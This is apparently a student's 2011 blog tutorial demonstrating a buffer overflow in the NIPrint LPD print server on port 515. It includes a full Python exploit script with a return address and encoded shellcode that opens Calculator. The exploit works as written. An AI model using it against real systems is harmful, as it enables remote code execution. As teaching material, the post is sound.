Friday, 4 November 2011

Week 9 - A NIPrint Buffer Overflow

So today we were given a tutorial on how to execute an exploit against a buffer overflow vulnerability in a program called NIPrint. I don't know much about the program but apparently it's an old program used for sharing print servers in Linux or something to that effect. Anyways the point is that the program provides an opportunity to exploit a buffer overflow to demonstrate how it works. I will basically be showing you a demonstration of how to execute the buffer overflow and actually make it happen.

In class we did a remote buffer overflow between two connected VM's on the same network but for the sake of saving time I will be simulating the remote aspect of the exploit by using my hosts loopback IP address ( instead of a remote IP. Also note that this tutorial already assumes that you've done the work required to determine that the buffer we are exploiting requires 49 characters before it overwrites the return pointer in the stack and allows us to execute our code. Here is a link to a blog that can give you an explanation of how to get to that assumption.

So the first thing we have to do is open up NIPrint and confirm that it is functioning properly. After we open NIPrint we have to go to Configuration >> General Settings and enable both Local and Remote print servers by checking the boxes next to the options. After enabling the local and remote print servers NIPrint should look like this:

Next we'll just verify that the port that NIPrint listens on (515) is open and accepting connections. We'll do this by using the telnet command to connect to our localhost IP using port 515. The command to do this is "telnet 515" OR "telnet localhost 515". Either way, once you have connected if you press Enter once or twice you should see something like this:

The fact that we see "NIPrint received command: This command is not in LPD specification, ignored" tells us that we were able to connect on that port and that NIPrint is ready for the exploit to take place.

In order to demonstrate the buffer overflow I have written a simple Python script that essentially connects to the localhost IP on port 515, sends the data required to overflow the buffer and execute our "malicious" code, and then close the connection. Copy and paste the Python code between the lines into a Notepad document and save it with a .py extension, you will be ready to execute the overflow:
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect(('', 515))

s.send('A'*49 + '\xE3\x30\x9D\x7C' + '\x81\xc4\xff\xef\xff\xff\x44' + '\x90' + '\xd9\xf7\xd9\x74\x24\xf4\x5f\xbb\xed\xb4\x08\x08\x29\xc9\xb1\x33\x83\xc7\x04\x31\x5f\x14\x03\x5f\xf9\x56\xfd\xf4\xe9\x1e\xfe\x04\xe9\x40\x76\xe1\xd8\x52\xec\x61\x48\x63\x66\x27\x60\x08\x2a\xdc\xf3\x7c\xe3\xd3\xb4\xcb\xd5\xda\x45\xfa\xd9\xb1\x85\x9c\xa5\xcb\xd9\x7e\x97\x03\x2c\x7e\xd0\x7e\xde\xd2\x89\xf5\x4c\xc3\xbe\x48\x4c\xe2\x10\xc7\xec\x9c\x15\x18\x98\x16\x17\x49\x30\x2c\x5f\x71\x3b\x6a\x40\x80\xe8\x68\xbc\xcb\x85\x5b\x36\xca\x4f\x92\xb7\xfc\xaf\x79\x86\x30\x22\x83\xce\xf7\xdc\xf6\x24\x04\x61\x01\xff\x76\xbd\x84\xe2\xd1\x36\x3e\xc7\xe0\x9b\xd9\x8c\xef\x50\xad\xcb\xf3\x67\x62\x60\x0f\xec\x85\xa7\x99\xb6\xa1\x63\xc1\x6d\xcb\x32\xaf\xc0\xf4\x25\x17\xbd\x50\x2d\xba\xaa\xe3\x6c\xd1\x2d\x61\x0b\x9c\x2d\x79\x14\x8f\x45\x48\x9f\x40\x12\x55\x4a\x25\xe2\xa4\x47\xb0\x72\x1f\x32\xf9\x1f\xa0\xe8\x3e\x19\x23\x19\xbf\xde\x3b\x68\xba\x9b\xfb\x80\xb6\xb4\x69\xa7\x65\xb5\xbb\xc4\xe8\x25\x27\x25\x8e\xcd\xc2\x39\x5a')



Where you see 's.connect' is basically where we connect to the victims PC on the IP and port provided (in our case its our localhost IP) and where you see 's.send' is where we are sending the data to the victims PC. Basically we are sending 49 iterations of the letter A to the PC (which is enough to fill the buffer and cause the overflow) at which point we can then begin to push our "malicious" code onto the stack and execute our buffer overflow. For the sake of simplicity I will not breakdown the rest of the code but lets just say that this code is what gives us the ability to launch our "malicious" program. In our case because we are just basically doing a proof of concept to show that this actually works, we will simply be executing the code and having the Calculator program pop up on the victims computer.

Anyways the next step after we've created and saved our Python script is to actually run it. There are a variety of different ways to run a python script but in this case to make things easy I will simply navigate to the file on the desktop and double click it. If all goes well you should see an error message from Windows advising that NIPrint has crashed (because we've caused a buffer overflow) and the Windows Calculator should pop up:

So that's basically a buffer overflow, albeit a very simple one with not much purpose, but it demonstrates the ability to exploit a buffer overflow vulnerability in a specific program to execute code that was not intended to be executed.

Hope you enjoyed this demonstration!

No comments:

Post a Comment